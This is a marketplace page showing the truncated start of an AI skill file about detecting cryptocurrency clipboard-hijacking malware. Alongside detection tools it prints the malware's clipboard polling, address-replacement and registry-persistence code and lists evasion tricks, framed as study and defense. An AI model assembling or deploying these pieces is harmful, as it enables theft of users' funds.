Skip to main content

crypto-clipper-malware-detection

Detect and analyze cryptocurrency clipboard hijacking malware patterns, regex-based address detection, and cross-platform clipboard monitoring techniques

Aller à l'installation

Informations de source

Dépôt
reason-machines/devtools-skills
Dernière activité de la source
21 juin 2026 à 12:50
Langue détectée de SKILL.md
anglais
Étoiles
4
Forks
0

Options d'installation

Le prompt qui vérifie d'abord la source est sélectionné par défaut. Vous pouvez passer à une commande directe ou télécharger une copie locale.

Vérifiez les fichiers source

Lisez SKILL.md et les fichiers associés affichés par SkillsMP avant de décider de l'installer.

Affichage de SKILL.md

SKILL.md
Instructions source · Aperçu en lecture seule
name
crypto-clipper-malware-detection
description
Detect and analyze cryptocurrency clipboard hijacking malware patterns, regex-based address detection, and cross-platform clipboard monitoring techniques
triggers
["how do I detect crypto clipboard malware","analyze cryptocurrency address clipper patterns","identify clipboard hijacking techniques","validate crypto address regex patterns","detect malicious clipboard monitoring","analyze crypto clipper behavior","identify cryptocurrency address replacement malware","understand clipper malware detection"]
# Crypto Clipper Malware Detection > Skill by [ara.so](https://ara.so) — Devtools Skills collection. ## ⚠️ Security Notice **This project is MALWARE** designed to steal cryptocurrency by hijacking clipboard contents. It is documented here **ONLY** for: - Security research and malware analysis - Building detection mechanisms - Understanding attack patterns for defensive purposes - Educational cybersecurity training **DO NOT deploy this for malicious purposes. Doing so is illegal and unethical.** ## What This Project Does Crypto-Clipper is a cross-platform clipboard monitoring malware that: 1. **Monitors clipboard** continuously via polling (default 500ms intervals) 2. **Detects cryptocurrency addresses** using regex patterns for BTC, ETH, SOL, TRX, LTC, DOGE 3. **Replaces detected addresses** with attacker-controlled addresses from an address book 4. **Validates formats** including EIP-55 checksum, Base58, SegWit, Taproot 5. **Logs activity** to track successful replacements 6. **Persistence mechanisms** via Windows registry auto-start hooks 7. **Process disguise** by masquerading as legitimate system processes ## Detection Patterns ### Clipboard Monitoring Behavior The malware uses pyperclip polling with background threads: ```python # Detection signature: High-frequency clipboard polling import pyperclip import time import threading def monitor_clipboard(interval_ms=500): """Malicious clipboard monitoring pattern""" last_content = "" while True: try: current = pyperclip.paste() if current != last_content: # Pattern: Immediate processing of clipboard changes process_clipboard_content(current) last_content = current except: pass time.sleep(interval_ms / 1000) ``` **Detection indicators:** - Continuous pyperclip.paste() calls in tight loop - Background thread dedicated to clipboard monitoring - No user-initiated triggers for clipboard access ### Cryptocurrency Address Regex Patterns ```python # Address detection patterns used by the malware CRYPTO_PATTERNS = { "bitcoin": { "legacy": r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$", "segwit": r"^bc1q[a-z0-9]{38,58}$", "taproot": r"^bc1p[a-z0-9]{58}$" }, "ethereum": { "evm": r"^0x[a-fA-F0-9]{40}$" }, "solana": { "base58": r"^[1-9A-HJ-NP-Za-km-z]{32,44}$" }, "tron": { "base58": r"^T[1-9A-HJ-NP-Za-km-z]{33}$" }, "litecoin": { "legacy": r"^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$", "segwit": r"^ltc1[a-z0-9]{39,59}$" }, "dogecoin": { "legacy": r"^D[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}$" } } ``` ### Address Replacement Engine ```python # Malicious clipboard injection pattern def inject_malicious_address(detected_chain, original_address): """ MALWARE BEHAVIOR: Replaces legitimate crypto addresses """ address_book = load_address_book() # Find matching chain in attacker's address book for entry in address_book: if entry["chain"] == detected_chain: malicious_addr = entry["address"] # Silent clipboard replacement pyperclip.copy(malicious_addr) # Log the theft attempt log_replacement(original_address, malicious_addr, detected_chain) return True return False ``` ## Configuration Structure The malware uses `config.json` for operational parameters: ```json { "build": { "target_os": "windows", "output_name": "clip_monitor.exe", "process_name": "rdpclip", "startup_method": "registry", "registry_key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" }, "chains": { "bitcoin": { "enabled": true, "prefix": ["1", "3", "bc1"] }, "ethereum": { "enabled": true, "prefix": ["0x"] } }, "address_book": [ { "label": "Attacker BTC", "chain": "bitcoin", "address": "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa" } ], "detection": { "sensitivity": "high", "min_address_length": 26, "max_address_length": 62, "clipboard_watch_interval_ms": 500 } } ``` **Detection indicators:** - Address book with multiple crypto chains - Registry persistence configuration - Process name disguise settings - Clipboard polling interval configuration ## Persistence Mechanisms ### Windows Registry Auto-Start ```python # Malware persistence via Windows registry import winreg import os def install_persistence(exe_path, disguise_name="rdpclip"): """ MALWARE BEHAVIOR: Registry-based persistence """ reg_key = r"Software\Microsoft\Windows\CurrentVersion\Run" try: key = winreg.OpenKey( winreg.HKEY_CURRENT_USER, reg_key, 0, winreg.KEY_SET_VALUE ) winreg.SetValueEx( key, disguise_name, 0, winreg.REG_SZ, exe_path ) winreg.CloseKey(key) return True except Exception as e: return False ``` **Detection indicators:** - Unauthorized registry modifications in Run keys - Process names mimicking system processes (rdpclip, svchost, etc.) - Executable paths in unexpected locations ## Building Defensive Tools ### Address Validation Function ```python import re def validate_crypto_address(address, chain): """ Defensive: Validate crypto address format before use """ patterns = { "bitcoin": r"^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,62}$", "ethereum": r"^0x[a-fA-F0-9]{40}$", "solana": r"^[1-9A-HJ-NP-Za-km-z]{32,44}$" } if chain not in patterns: return False return bool(re.match(patterns[chain], address)) ``` ### Clipboard Monitoring Detection ```python import psutil import time def detect_clipboard_monitoring_processes(): """ Security tool: Identify processes with suspicious clipboard access """ suspicious_indicators = [] for proc in psutil.process_iter(['name', 'cmdline', 'num_threads']): try: # Check for pyperclip in command line cmdline = ' '.join(proc.info['cmdline'] or []) if 'pyperclip' in cmdline.lower(): suspicious_indicators.append({ 'pid': proc.pid, 'name': proc.info['name'], 'cmdline': cmdline, 'reason': 'Pyperclip usage detected' }) # Check for disguised process names disguise_names = ['rdpclip', 'clipman', 'clip_monitor'] if proc.info['name'].lower() in disguise_names: if not is_legitimate_system_process(proc): suspicious_indicators.append({ 'pid': proc.pid, 'name': proc.info['name'], 'reason': 'Disguised process name' }) except (psutil.NoSuchProcess, psutil.AccessDenied): continue return suspicious_indicators ``` ### Address Book Comparison Tool ```python import difflib def detect_address_replacement(original, current): """ Security tool: Detect if clipboard address was replaced Returns: (is_replaced, similarity_score, chain_type) """ # Check if both are valid crypto addresses chains = ["bitcoin", "ethereum", "solana", "tron"] original_chain = None current_chain = None for chain in chains: if validate_crypto_address(original, chain): original_chain = chain if validate_crypto_address(current, chain): current_chain = chain # Both valid addresses but different chains = suspicious if original_chain and current_chain and original_chain != current_chain: return (True, 0.0, f"{original_chain} -> {current_chain}") # Same chain but different addresses if original_chain == current_chain and original != current: similarity = difflib.SequenceMatcher(None, original, current).ratio() return (True, similarity, original_chain) return (False, 1.0, None) ``` ## Malware Analysis Workflow ### 1. Static Analysis ```python import json import os def analyze_clipper_config(config_path): """ Analyze clipper configuration for threat assessment """ with open(config_path, 'r') as f: config = json.load(f) report = { "targeted_chains": [], "persistence_methods": [], "attacker_addresses": [], "disguise_techniques": [], "risk_level": "UNKNOWN" } # Extract targeted chains for chain, settings in config.get("chains", {}).items(): if settings.get("enabled"): report["targeted_chains"].append(chain) # Extract attacker addresses for entry in config.get("address_book", []): report["attacker_addresses"].append({ "chain": entry["chain"], "address": entry["address"], "label": entry.get("label", "") }) # Extract persistence methods if config.get("build", {}).get("startup_method") == "registry": report["persistence_methods"].append("Windows Registry Run Key") # Extract disguise techniques process_name = config.get("build", {}).get("process_name", "") if process_name: report["disguise_techniques"].append(f"Process masquerading as '{process_name}'") # Risk assessment num_chains = len(report["targeted_chains"]) num_addresses = len(report["attacker_addresses"]) if num_chains >= 4 and num_addresses >= 4: report["risk_level"] = "CRITICAL" elif num_chains >= 2: report["risk_level"] = "HIGH" else: report["risk_level"] = "MEDIUM" return report ``` ### 2. Dynamic Analysis (Sandboxed) ```python import subprocess import json from datetime import datetime def sandbox_clipper_execution(clipper_path, duration_seconds=60): """ Run clipper in monitored sandbox environment WARNING: Only run in isolated VM/container """ log = { "start_time": datetime.now().isoformat(), "clipboard_access_count": 0, "registry_modifications": [], "network_connections": [], "file_operations": [] } # Monitor with process tracking (pseudo-code - use actual sandbox) # This should run in a completely isolated environment return log ``` ## Common Detection Evasion Techniques The malware employs several evasion strategies: 1. **Process Name Disguise**: Mimics legitimate Windows processes (rdpclip, svchost) 2. **Low Polling Frequency**: Configurable intervals to reduce CPU footprint 3. **Silent Failures**: Catches all exceptions to avoid crashes 4. **Legitimate-Looking Paths**: Uses system directories for deployment 5. **No Network Activity**: Purely local operation to avoid firewall alerts ## Defensive Measures ### User-Level Protection ```python import hashlib import time class ClipboardProtector: """ User-level clipboard protection against hijacking """ def __init__(self): self.last_hash = None self.verification_window_ms = 1000 def protect_copy(self, text): """ Copy with verification to detect replacement """ import pyperclip # Copy to clipboard pyperclip.copy(text) time.sleep(0.1) # Brief delay # Verify what's actually in clipboard actual = pyperclip.paste() if actual != text: raise SecurityException( f"Clipboard hijacking detected!\n" f"Expected: {text[:20]}...\n" f"Found: {actual[:20]}..." ) # Store hash for periodic verification self.last_hash = hashlib.sha256(text.encode()).hexdigest() return True def verify_clipboard(self): """ Periodic verification of clipboard contents """ import pyperclip current = pyperclip.paste() current_hash = hashlib.sha256(current.encode()).hexdigest()
Voir sur GitHub
Ce SKILL.md est tres volumineux, SkillsMP affiche donc ici seulement la premiere section. Voir sur GitHub